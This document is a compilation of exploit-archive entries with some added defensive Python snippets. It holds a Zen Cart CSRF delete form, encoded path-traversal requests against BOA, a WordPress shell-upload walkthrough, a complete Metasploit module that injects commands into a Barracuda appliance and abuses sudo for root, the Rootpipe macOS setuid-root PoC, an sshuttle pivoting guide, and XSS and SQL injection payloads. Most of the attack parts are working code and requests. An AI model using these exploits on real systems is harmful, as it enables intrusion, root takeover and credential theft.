Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.

Zen Cart 1.3.9h is vulnerable; other versions may be affected.

<form name="products" action="http://www.example.com/path_to_admin/product.php?action=delete_product_confirm" method="post">
<label for="securityToken">Security Token</label><br/><input type="text" name="securityToken" value="Can be anything" /><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text" name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" border="0" alt="Delete" value=" Delete Product">
</form>
-
BOA Web Server 0.94.8.2 - Arbitrary File Access
###############################################################
ID:        S21SEC-005-en
Title:     Vulnerability in BOA web server v0.94.8.2
Date:      03/10/2000
Status:    Vendor contacted, patch available
Scope:     Arbitrary file access
Platforms: Unix
Author:    llmora
Location:  http://www.s21sec.com/en/avisos/s21sec-005-en.txt
Release:   Public
###############################################################

S 2 1 S E C
http://www.s21sec.com

Vulnerability in BOA web server v0.94.8.2

There is a security bug in BOA v0.94.8.2 that allows a malicious user to access files outside the document root of the web server as the user the server runs as.

About BOA
---------

Boa is an open source high performance web server for Unix-alike computers (http://www.boa.org). It does file serving and dynamic content generation via CGI.

Vulnerability description
-------------------------

- Reading any file in the web server

The boa web server suffers from the well-known "../.." web server problem. If we request a document from the web server using the "../.." technique, we get:

homer:~$ telnet ilf 80
Escape character is '^]'.
GET /../../../../../../../../../../../etc/motd HTTP/1.0

HTTP/1.0 404 Not Found
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY><H1>404 Not Found</H1>
The requested URL /etc/motd was not found on this server.
</BODY></HTML>
Connection closed by foreign host.
homer:~$

So apparently it doesn't work, as boa checks for "/.." in the path. By URL-encoding the "." in the request we are able to skip the ".." test, because the check runs on the raw request string before the percent-encoding is decoded. This lets us read the contents of any file the user running the web server has access to:

homer:~$ telnet ilf 80
GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd HTTP/1.0

HTTP/1.0 200 OK
[... the /etc/motd file content is shown]
Connection closed by foreign host.
homer:~$

If the administrator enables extension based CGI support with a line like this in the boa.conf file:

AddType application/x-httpd-cgi cgi

then a request for a file ending in .cgi will result in the file being executed with the privileges of the user id running the web server. This file can be placed in any folder throughout the file system, not strictly under the DocumentRoot, and be accessed using the previous bug, leading to compromise of the web server account.

Affected versions
-----------------

This bug has been tested and verified to be present in v0.94.8.2 of the boa web server. Version 0.92 of boa is not affected by this problem.

Fix information
---------------

The boa development team has released v0.94.8.3 which fixes this vulnerability. Upgrades are available at the vendor website (http://www.boa.org).

S21SEC wishes to thank the boa development team for acknowledging the issue and releasing a security patch in a matter of hours.

Additional information
----------------------

This vulnerability was found and researched by:

Lluis Mora
llmora@s21sec.com

You can find the latest version of this advisory at:
http://www.s21sec.com/en/avisos/s21sec-005-en.txt

And other S21SEC advisories at http://www.s21sec.com/en/avisos/
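The root cause is ordering: the traversal check runs on the raw request path, and the percent-decoding that turns %2E into "." happens afterwards. The Python below is an added example (not boa's code; boa is written in C and its actual check is not reproduced here) that puts the two approaches side by side: a naive check modelled on the flawed one, and a resolver that decodes first, normalises, and then confirms the result still lies under the document root. The document root /var/www and the request lines are assumptions for the example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote


def naive_is_safe(raw_path: str) -> bool:
    """Flawed approach: look for '/..' in the request path BEFORE percent-decoding it."""
    return "/.." not in raw_path


def resolve_under_docroot(docroot: str, raw_path: str) -> Optional[str]:
    """Decode first, then normalise, then confine: returns the filesystem path or None."""
    decoded = unquote(raw_path)          # '%2E%2E' -> '..', '%2F' -> '/'
    if "\x00" in decoded:                # NUL would truncate the path in a C open()
        return None
    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Containment check on the resolved path, not on the string the client sent.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def handle_request(docroot: str, request_line: str) -> Optional[str]:
    """Parse 'GET /path HTTP/1.0' and return the file to serve, or None for a refusal."""
    parts = request_line.split()
    if len(parts) != 3 or parts[0] != "GET":
        return None
    return resolve_under_docroot(docroot, parts[1])


if __name__ == "__main__":
    docroot = "/var/www"  # assumed document root
    for req in ("GET /../../etc/motd HTTP/1.0",
                "GET /%2E%2E/%2E%2E/etc/motd HTTP/1.0",
                "GET /%2E%2E%2F%2E%2E%2Fetc/motd HTTP/1.0",
                "GET /docs/../index.html HTTP/1.0"):
        raw = req.split()[1]
        print(f"{raw:40} naive_ok={naive_is_safe(raw)!s:5} resolved={handle_request(docroot, req)}")
```

Note that the encoded-slash variant (%2F) also slips past the naive check, since neither "/" nor ".." appears literally; decoding exactly once, as the server itself will, and checking the resolved path closes every encoding of the same traversal.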
-
WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload
##################################################################################################
#Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerability
#Author : Manish Kishan Tanwar AKA error1046
#Home Page : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/
#Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip
#Date : 9/04/2015
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

The file uploading code (uploader.php) in the Windows Desktop and iPhone Photo Uploader plugin doesn't check the file extension before writing the upload to the server, and uploader.php is reachable without authentication, so it is vulnerable to arbitrary file upload.

///////////////
/// POC ////
///////////////

Uploading PHP shell
=================================

Just open uploader.php in the plugin directory:

http://target.com/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php

browse to your PHP shell and submit it.

After uploading, you will find your shell in the uploads directory at the following location:

http://target.com/wp-content/uploads/i-dump-uploads/

demo:-

http://127.0.0.1/wordpress/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php

and upload your shell.

--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################

--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)

--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
-
Barracuda Firmware 5.0.0.012 - (Authenticated) Remote Command Execution (Metasploit)
# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit
# Exploit Author: xort
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/webfilter
# Version: Firmware <= 5.0.0.012
# Tested on: Vx and Hardware platforms
#
# Post-auth remote root in Barracuda Firmware <= 5.0.0.012 for any under-privileged user with
# report generating capabilities. This exploit leverages a command injection bug (the SMB
# "external server" username of a new report is placed unquoted in a shell command) along with
# poor sudo permissions to obtain root. xort@blacksecurity.org

require 'msf/core'
require 'digest/md5'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root',
      'Description' => %q{
        This module exploits a remote command execution vulnerability in the Barracuda
        Firmware Version <= 5.0.0.012 by exploiting a vulnerability in the web administration
        interface. By sending a specially crafted request it's possible to inject system
        commands while escalating to root due to a relaxed sudo configuration on the local
        machine.
      },
      'Author'       => [ 'xort' ], # metasploit module
      'Version'      => '$Revision: 12345 $',
      'References'   => [ [ 'none', 'none' ] ],
      'Platform'     => [ 'linux' ],
      'Arch'         => [ ARCH_X86 ],
      'SessionTypes' => [ 'shell' ],
      'Privileged'   => true,
      'Payload'      => {
        # note: meterpreter can't run on host due to kernel 2.4 incompatibilities + this is stable
        'Compat' => { 'ConnectionType' => 'find' }
      },
      'Targets'       => [ [ 'Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ],
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('PASSWORD', [ false, 'Session password value returned by a previous login', "" ]),
        OptString.new('ET',       [ false, 'Session "et" value returned by a previous login', "" ]),
        OptString.new('USERNAME', [ true,  'Device username', "admin" ]),
        OptString.new('CMD',      [ false, 'Command to execute', "" ]),
        Opt::RPORT(8000),
      ], self.class)
  end

  def do_login(username, password, et)
    vprint_status("Logging into machine with credentials...\n")

    # timeout
    timeout = 1550

    # params
    password_clear = "admin"
    real_user      = ""
    login_state    = "out"
    enc_key        = Rex::Text.rand_text_hex(32)
    et             = "1358817515"
    locale         = "en_US"
    user           = username
    password       = Digest::MD5.hexdigest(username + enc_key)
    enctype        = "MD5"
    password_entry = ""

    vprint_status("Starting first routine...\n")

    data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}" +
           "&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}" +
           "&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login"
    vprint_status("#{data}\n")

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "/cgi-mod/index.cgi",
      'cookie' => "",
      'data'   => data
    }, timeout)

    vprint_status("login got code: #{res.code} ... continuing to second request...")
    File.open("/tmp/output2", 'w+') { |f| f.write(res.body) }

    # pull the session password and "et" values out of the hidden form fields in the response
    password = res.body.split("\n").grep(/(.*)id=\"password\" value=\"(.*)\"/) { $2 }[0]
    # change to match below for a more exact result
    et = res.body.split("\n").grep(/(.*)id=\"et\" value=\"([^\"]+)\"/) { $2 }[0]

    vprint_status("password got back = #{password} - et got back = #{et}\n")
    return password, et
  end

  def run_command(username, password, et, cmd)
    vprint_status("Running Command...\n")

    # The injection point is UPDATE_new_external_server_username: backticks in the SMB
    # username run #{cmd} when the report delivery job is processed.
    exploitreq = [
      [ "primary_tab", "BASIC" ], [ "secondary_tab", "reports" ],
      [ "realm", "" ], [ "auth_type", "Local" ],
      [ "user", username ], [ "password", password ], [ "et", et ],
      [ "role", "" ], [ "locale", "en_US" ], [ "q", "" ],
      [ "UPDATE_new_report_time_frame", "custom" ],
      [ "report_start", "2013-01-25 01:14" ], [ "report_end", "2013-01-25 02:14" ],
      [ "type", "" ], [ "ntlm_server", "" ], [ "kerb_server", "" ],
      [ "local_group", "changeme" ], [ "ip_group", "20.20.108.0/0.0.0.0" ],
      [ "ip_address__0", "" ], [ "ip_address__1", "" ], [ "ip_address__2", "" ], [ "ip_address__3", "" ],
      [ "netmask__0", "" ], [ "netmask__1", "" ], [ "netmask__2", "" ], [ "netmask__3", "" ],
      [ "UPDATE_new_report_pattern_values", "" ], [ "UPDATE_new_report_pattern_text", "" ],
      [ "UPDATE_new_report_filter_destination", "domain" ],
      [ "filter_domain", "" ], [ "UPDATE_new_report_filter_domain", "" ],
      [ "UPDATE_new_report_filter_category", "" ],
      [ "UPDATE_new_report_exclude_from", "" ], [ "UPDATE_new_report_exclude_to", "" ],
      [ "UPDATE_new_report_exclude_days", "" ],
      [ "allow", "allow" ], [ "block", "block" ], [ "warn", "warn" ], [ "monitor", "monitor" ],
      [ "UPDATE_new_report_filter_actions", "allow,block,warn,monitor" ],
      [ "UPDATE_new_report_filter_count", "10" ],
      [ "UPDATE_new_report_chart_type", "vbar" ], [ "UPDATE_new_report_format", "html" ],
      [ "DEFAULT_new_report_group_expand", "No" ],
      [ "UPDATE_new_report_expand_user_count", "5" ], [ "UPDATE_new_report_expand_domain_count", "5" ],
      [ "UPDATE_new_report_expand_cat_count", "5" ], [ "UPDATE_new_report_expand_url_count", "5" ],
      [ "UPDATE_new_report_expand_threat_count", "5" ],
      [ "report", "on" ],
      [ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ],
      [ "UPDATE_new_report_id", "" ], [ "UPDATE_new_report_enabled", "Yes" ],
      [ "secondary_scope", "report" ], [ "secondary_scope_data", "" ],
      [ "UPDATE_new_report_reports", "sessions_by_user,infection_activity" ],
      [ "UPDATE_new_report_delivery", "external" ], [ "UPDATE_new_report_delivery_dest_email", "" ],
      [ "UPDATE_new_report_server", "new" ], [ "UPDATE_new_external_server_type", "smb" ],
      [ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ],
      [ "UPDATE_new_external_server", "4.4.4.4" ], [ "UPDATE_new_external_server_port", "445" ],
      [ "UPDATE_new_external_server_username", "\"` #{cmd} `\"" ],
      [ "UPDATE_new_external_server_password", "asdf" ],
      [ "UPDATE_new_external_server_path", "/" + Rex::Text.rand_text_alphanumeric(15) ],
      [ "UPDATE_new_report_frequency", "once" ], [ "UPDATE_new_report_split", "no" ],
      [ "add_report_id", "Apply" ], [ "remover", "" ]
    ]

    data = Rex::MIME::Message.new
    data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30)
    exploitreq.each do |xreq|
      data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"")
    end

    post_data = data.to_s
    post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------")

    datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"

    vprint_status("sending...")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "/cgi-mod/index.cgi",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data,
      'headers' => {
        'Accept'          => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        'Accept-Language' => "en-US,en;q=0.5"
      }
    })

    if res.code == 200
      vprint_status("You can now reuse the login params you were supplied (PASSWORD and ET options) " +
                    "to avoid the lengthy wait at the exploit's initial launch....\n")
      vprint_status("password: #{password} et: #{et}\n")
    end

    vprint_status("login got code: #{res.code} from report_results.cgi\n")
    File.open("/tmp/output4", 'w+') { |f| f.write(res.body) }
  end

  def run_script(username, password, et, cmds)
    vprint_status("running script...\n")
  end

  def exploit
    # timeout
    timeout = 1550

    # params
    real_user      = ""
    login_state    = "out"
    et             = "1358817515" # epoch time
    locale         = "en_US"
    user           = datastore['USERNAME']
    password       = ""
    enctype        = "MD5"
    password_entry = ""
    password_clear = "admin"

    vprint_status("<- Encoding payload to elf string...")
    elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    # extra escaping to get passed down correctly through the injected echo -ne
    encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/, '\\\\\\\\\\x\1\2')

    if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?
      # reuse a session obtained on a previous run
      password_clear = "admin"
      password = datastore['PASSWORD']
      et = datastore['ET']
    else
      password, et = do_login(user, password, et)
      vprint_status("new password: #{password}\n")
    end

    sleep(5)

    # optional: run an arbitrary command first
    if not datastore['CMD'].nil? and not datastore['CMD'].empty?
      cmd = datastore['CMD']
      run_command(user, password, et, cmd)
    end

    # create elf in /tmp, abuse sudo to overwrite another command we have sudo access to
    # (static_routes), then execute with sudo perm
    cmd  = "echo -ne #{encoded_elf} > /tmp/x ;"
    cmd += "chmod +x /tmp/x ;"
    # backup static_routes file
    cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz ;"
    cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes ;"
    # execute elf as root
    cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;"
    # restore static_routes file
    cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes"
    run_command(user, password, et, cmd)

    sleep(2)
    handler
    sleep(5)
  end
end
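Two weaknesses are chained in the module above: a form field that ends up inside a shell command string, and a sudo rule that lets a low-privilege account run a file-copying binary as root. The Python below is an added example (not Barracuda code) that shows both from the defender's side. The command the appliance actually builds is not shown in the advisory, so the mount invocation here is a hypothetical stand-in; the sudoers excerpt is constructed for the example and is not the appliance's real configuration.

```python
import re
import shlex
from typing import List, Dict

# Constructed sample; NOT the real appliance sudoers file.
SAMPLE_SUDOERS = """\
Defaults    env_reset
root        ALL=(ALL) ALL
product     ALL=(root) NOPASSWD: /bin/cp, /home/product/code/config/static_routes
backup      ALL=(root) NOPASSWD: /usr/bin/rsync
"""

# Binaries that can write arbitrary files or spawn a shell: running them as root via sudo
# is equivalent to granting root (cp can overwrite any other sudo-allowed target).
WRITE_OR_SHELL = {"cp", "mv", "tee", "dd", "install", "chmod", "chown", "sh", "bash", "perl", "python"}


def build_mount_unsafe(server: str, share: str, username: str, password: str) -> str:
    """Same pattern the module abuses: untrusted fields dropped into one shell string.
    A username of `id` is evaluated by the shell before mount ever runs."""
    return f'mount -t cifs //{server}/{share} /mnt/report -o username="{username}",password="{password}"'


def build_mount_safe(server: str, share: str, username: str, password: str) -> List[str]:
    """argv form: hand this to subprocess.run(argv) with no shell, so backticks stay literal."""
    return ["mount", "-t", "cifs", f"//{server}/{share}", "/mnt/report",
            "-o", f"username={username},password={password}"]


def audit_sudoers(text: str) -> List[Dict[str, object]]:
    """Flag sudoers rules that hand out root-equivalent commands, NOPASSWD or not."""
    findings = []
    rule = re.compile(r"^(\S+)\s+(\S+?)=(?:\(([^)]*)\))?\s*(.*)$")
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = rule.match(line)
        if not m:
            continue
        user, _host, runas, rest = m.groups()
        tags, cmds = re.match(r"^((?:[A-Z]+:\s*)*)(.*)$", rest).groups()
        nopasswd = "NOPASSWD" in tags
        for cmd in (c.strip() for c in cmds.split(",")):
            binary = cmd.split()[0] if cmd else ""
            if cmd == "ALL":
                reason = "ALL commands"
            elif binary.rsplit("/", 1)[-1] in WRITE_OR_SHELL:
                reason = "can overwrite files or spawn a shell as " + (runas or "root")
            else:
                continue
            findings.append({"user": user, "cmd": cmd, "nopasswd": nopasswd, "reason": reason})
    return findings


if __name__ == "__main__":
    inj = "` id `"
    print(build_mount_unsafe("4.4.4.4", "reports", inj, "asdf"))
    print(shlex.join(build_mount_safe("4.4.4.4", "reports", inj, "asdf")))
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f)
```

In the sample rule set, the product account's NOPASSWD right to /bin/cp is what turns a web-tier command injection into root: cp as root can replace the other sudo-permitted file with /bin/sh, exactly the sequence the module's final command string performs.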
-
Apple Mac OSX < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Local Privilege Escalation
########################################################
#
# PoC exploit code for rootpipe (CVE-2015-1130)
#
# Created by Emil Kvarnhammar, TrueSec
#
# Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
#
########################################################
import os
import sys
import platform
import re
import ctypes
import objc
from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
from Foundation import NSAutoreleasePool


def load_lib(append_path):
    return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path)


def use_old_api():
    # 10.7 and 10.8 expose the privileged file-writing helper through Admin.framework;
    # later releases use SystemAdministration.framework's WriteConfigClient.
    return re.match(r"^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])


args = sys.argv

if len(args) != 3:
    print("usage: exploit.py source_binary dest_binary_as_root")
    sys.exit(-1)

source_binary = args[1]
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

# mode 04777: setuid root and world-executable, so the copy written by the root helper
# becomes a root shell for any local user
attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(0o4777, NSFilePosixPermissions)

data = NSData.alloc().initWithContentsOfFile_(source_binary)

print("will write file %s" % dest_binary)

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()
    tool = st.tool()
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
else:
    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
    WriteConfigClient = objc.lookUpClass("WriteConfigClient")
    client = WriteConfigClient.sharedClient()
    # the XPC helper never verifies that the caller was actually authorized
    client.authenticateUsingAuthorizationSync_(None)

    tool = client.remoteProxy()
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)

print("Done!")

del pool
-
Pivoting con Sshuttle
Sshuttle is a program that lets you emulate something close to a VPN over an SSH connection. Its basic usage is:

sshuttle -r <user>@<ssh server> <network the VPN will operate on>/<netmask in CIDR>

This way we connect over SSH through sshuttle. If we add the -N argument, sshuttle tries to guess the networks the VPN should cover (it reads them from the server's routing table), so we would not have to specify them ourselves.

For example, if our network is 192.168.0.0/24 and we connect to an SSH server (192.168.0.10) on that same network, but that server also has access to the 192.168.30.0/24 network, the command to use would be:

sshuttle -r <user>@192.168.0.10 192.168.30.0/24

since 192.168.30.0/24 is the network we want the "VPN" connection to operate on.

Sshuttle has some advantages and disadvantages. Unlike proxychains, for instance, if we launch several VPNs one on top of another, passing through different networks, we can always reach the resources of each of them without being limited to the network of the last VPN connection we launched. On the other hand, sshuttle does not carry ICMP traffic or nmap's raw-socket scans: with its default nat method it only forwards TCP (and DNS if --dns is given), so ping and a default nmap scan show nothing, while reaching a web server through it works without problems. This, then, is the downside of sshuttle: not being able to use nmap, ping and the like. It also needs administrator privileges to run, because it rewrites the local firewall rules (iptables or pf) to redirect traffic into the tunnel.

So far we have logged into SSH with credentials, but what happens if we only have access with a private key? Sshuttle has no option of its own for a key file, but this can be worked around by passing the key through the ssh command it wraps:

sshuttle -r <user>@<ssh server> --ssh-cmd "ssh -i <private key file>" <network the VPN will operate on>/<netmask in CIDR>

This way we can log in using a private key.

If in any use of sshuttle we get an error of this kind:

client: Connected.
client_loop: send disconnect: Broken pipe
client: fatal: server died with error code 255

we can fix it with the -x parameter, which lets us exclude an IP from the range the VPN is going to operate on. This problem can occur when the device we connect to belongs to the very network we want the VPN to operate on: the tunnel then captures its own SSH control connection. In that case we would do the following:

sshuttle -r <user>@<ssh server> <network the VPN will operate on>/<netmask in CIDR> -x <ssh server>

This excludes the SSH server from the VPN, so to speak.

Besides everything seen so far, sshuttle has an option to send our DNS requests through the proxy as well, so that we use the DNS servers configured on the SSH server machine. The argument to add on the command line is simply --dns. It can go at the beginning or at the end.

Finally, another sshuttle argument is -D, which sends the connection to the background once we are connected.

And that covers sshuttle's functionality, at least its main and most common options.
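The options walked through above (subnets, --ssh-cmd for a key file, --dns, -D, and -x for the "Broken pipe" case) are easy to get wrong when pivoting through several hops by hand. The Python below is an added example (not part of sshuttle or of the original article) that assembles the sshuttle command line from those inputs and, using the standard ipaddress module, automatically appends -x <server> whenever the SSH server's address falls inside one of the forwarded subnets, which is exactly the situation the article says produces the "server died with error code 255" failure. The hosts and subnets used in the usage block are the article's own examples plus one constructed case.

```python
import ipaddress
import shlex
from typing import List, Optional


def build_sshuttle_cmd(user: str, server: str, subnets: List[str],
                       key_file: Optional[str] = None, dns: bool = False,
                       daemon: bool = False, auto_detect: bool = False) -> List[str]:
    """Return the sshuttle argv for a pivot through user@server covering the given subnets.

    If `server` is an IP address that lies inside one of `subnets`, '-x server' is added so the
    tunnel does not swallow its own SSH control connection (the 'Broken pipe' failure).
    If `server` is a hostname it cannot be tested, so the caller must add -x by hand.
    """
    argv = ["sshuttle", "-r", f"{user}@{server}"]
    if key_file:
        # sshuttle has no key-file flag of its own; pass it through the ssh command it wraps.
        argv += ["--ssh-cmd", f"ssh -i {shlex.quote(key_file)}"]
    if dns:
        argv.append("--dns")      # resolve through the SSH server's configured DNS
    if daemon:
        argv.append("-D")         # background the client once connected
    if auto_detect:
        argv.append("-N")         # also take subnets from the server's routing table

    nets = [ipaddress.ip_network(s, strict=False) for s in subnets]
    argv += [str(n) for n in nets]

    try:
        server_ip = ipaddress.ip_address(server)
    except ValueError:
        server_ip = None          # hostname: containment cannot be checked here
    if server_ip is not None and any(server_ip in n for n in nets):
        argv += ["-x", str(server_ip)]
    return argv


if __name__ == "__main__":
    # Article's example: server on 192.168.0.0/24, pivot into 192.168.30.0/24 (no -x needed)
    print(shlex.join(build_sshuttle_cmd("user", "192.168.0.10", ["192.168.30.0/24"])))
    # Constructed case: the SSH server itself lives in the forwarded subnet, so -x is added
    print(shlex.join(build_sshuttle_cmd("user", "192.168.30.5", ["192.168.30.0/24"],
                                        key_file="/root/keys/id_rsa", dns=True, daemon=True)))
```

shlex.join is used only to print a copy-pasteable line; if you execute the command from Python, pass the list to subprocess.run directly so no shell re-parsing takes place.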
-
RabbitWiki - 'title' Cross-Site Scripting
source: https://www.securityfocus.com/bid/51971/info

RabbitWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/webmasters/s/RabbitWiki/index.php?title=%22%3E\%3Cscript%3Ealert%28%22rabbit%20says:hello%22%29%3C/script%3E
-
eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities
source: https://www.securityfocus.com/bid/51973/info

eFront Community++ is prone to an SQL-injection vulnerability and multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data.

Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.

eFront Community++ 3.6.10 is vulnerable; other versions may also be affected.

SQL Injection:

http://www.example.com/communityplusplus/www/administrator.php?ctg=course&edit_course=-1'[SQL INJECTION!]

HTML Injection:

The vulnerabilities can be exploited by a remote attacker with low or high required user interaction. The stored payload (an <iframe> with an onload handler) was placed in a login name, a forum name, a poll name and a language-table filter; the rendered markup below shows where it lands. For demonstration or to reproduce:

<td xmlns="http://www.w3.org/1999/xhtml" class="layoutColumn center">
<div id="messageBlock" class="block">
<div class="blockContents messageContents">
<table class="messageBlock">
<tbody><tr><td>
<img title="_FAILURE" alt="_FAILURE" class="sprite32 sprite32-warning" src="themes/default/images/others/transparent.gif"/>
</td>
<td class="failureBlock">.....Invalid login name: "> (403) <a onclick="eF_js_showDivPopup('Error Details', 2, 'error_details')" href="javascript:void(0)">More info</a></td>
<td><img onclick="window.Effect ? new Effect.Fade($('messageBlock')) : document.getElementById('messageBlock').style.display = 'none';" title="Close" alt="Close" class="sprite32 sprite32-close" src="themes/default/images/others/transparent.gif"/></td></tr>
</tbody></table>
</div>
</div>
<table class="centerTable">

...or

<tr class="oddRowColor">
<td>
<img title="Forum" alt="Forum" class="forumIcon sprite32 sprite32-forum" src="themes/default/images/others/transparent.gif"/><div>
<a href="/communityplusplus/www/administrator.php?ctg=forum&forum=6">"><iframe a="" <<="" onload='alert("VL")' src="a">
<p></p>
</div>
</td>
<td>0 Subforums, 0 Topics, 0 Messages </td>
<td><span class = "emptyCategory">Never</span> </td>
<td class = "centerAlign">

...or

<div>
<a style="white-space: normal;" class="smallHeader" href="/communityplusplus/www/administrator.php?ctg=forum&poll=1">"><iframe a="" <<="" onload="alert(document.cookie)" src="a">
<p><p>"><iframe src=a onload=alert(document....</p></div>
</td>

...or

<tr class="oddRowColor defaultRowHeight">.....<td colspan="3" class="emptyCategory">No data found</td></tr>
<tr class="defaultRowHeight"><td colspan="4" class="sortedTableFooter"><div class="sortTablefilter"><span id="languagesTable_currentFilter" style="display: none;">"><iframe span="" <<="" onload='alert("VL")' src="a"/></span><input type="text" id="0_sortedTable_filter" onkeypress="if (event.which == 13 || event.keyCode == 13) {eF_js_filterData(0); return false;}" value=""><iframe src=a onload=alert("VL") <" onclick='if (this.value.match("Filter...")) this.value = "";'/></div><span style="vertical-align: middle;">Rows: </span><select onchange="numRows = parseInt(this.options[this.selectedIndex].value);eF_js_changeRowsPerPage(0, numRows)"

...or

</tr><tr>
<td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1327968000"/></td>
<td class="calendar "><a href="administrator.php?ctg=calendar&view_calendar=1327968000"/></td>
<td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1328054400">1</a></td>
<td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1328140800">2</a></td>
<td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1328227200">3</a></td>
<td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1328313600">4</a></td>
<td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1328400000">5</a></td>
</tr>
-
Zimbra - 'view' Cross-Site Scripting
source: https://www.securityfocus.com/bid/51974/info

Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

